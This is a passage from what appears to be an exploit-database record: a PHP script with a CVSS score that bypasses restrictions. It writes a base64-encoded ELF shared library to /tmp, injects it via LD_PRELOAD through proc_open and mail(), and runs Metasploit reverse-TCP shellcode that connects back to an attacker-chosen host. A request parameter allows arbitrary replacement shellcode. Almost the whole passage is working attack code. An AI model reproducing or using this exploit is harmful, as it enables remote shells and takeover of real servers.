(x86)\n$shellcode_loader=\n\"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\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA\nXgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW\nAAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA\nAAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA\n3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH\nQ0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0\nLjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt\ncjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z\neW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA\nLmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k\neW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA\nBAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC\nAAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA\nAAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA\nAP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA\nIAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI\nAAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD\nAACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA\nABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA\nAgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA\nAAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A\nAAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A\nAAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA\nCAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0\nHwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA\nAAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA\nAAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA\nAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ\nAAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA\nAAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA\nYAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD\nAAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf\nAAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS\nAAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA\nAAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j\nAAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA\nAAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA\nAAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA\nEADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA\nAAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf\nR0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0\nX3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf\nUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w\nAF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x\nLjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==\" ;\n}\n\nif (!function_exists('file_put_contents')){\n function file_put_contents($filename, $data){\n $f = @fopen($filename, 'w');\n if (!$f){\n return false;\n }\n else{\n $bytes = fwrite($f, $data);\n fclose($f);\n return $bytes;\n }\n }\n}\n\n// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\nfile_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));\n$ip = gethostbyname($host);\n\n$port1 = sprintf('%c', ($port>> 8)&255 );\n$port2 = sprintf('%c', ($port>> 0)&255 );\n\n$part = explode('.', $ip);\n//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);\n$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);\n\n/*\n * linux/x86/shell_reverse_tcp - 71 bytes\n * http://www.metasploit.com\n * Encoder: generic/none\n * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,\n * PrependSetresuid=false, PrependSetreuid=false,\n * PrependSetuid=false, PrependChrootBreak=false,\n * AppendExit=false\n */\n\n\n$Xshellcode =\n\"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\".\n\"\\x5b\\x5e\\x68\".$STRINGIP.\"\\x66\\x68\".$port1.$port2.\"\\x66\\x53\\x6a\\x10\".\n\"\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\".\n\"\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\".\n\"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x00\" ;\n\nif(isset($_REQUEST['shellcode'])){\n// just for fans of metasploit\n$Xshellcode=base64_decode($_REQUEST['shellcode']);\n}\n\nfile_put_contents(\"/tmp/.X11-IHSTEAM\", $Xshellcode);\n\n$cwd = '/tmp/';\n$env = array('LD_PRELOAD' => '/tmp/shellcode.so');\nunset($var);\n\n$descriptorspec = array(0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"));\n\n// BOOM\nproc_open('IHSteam', $descriptorspec, $var, $cwd, $env);\nmail(\"IHSteam\",\"IHSteam\",\"IHSteam\",\"IHSteam\");\n?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}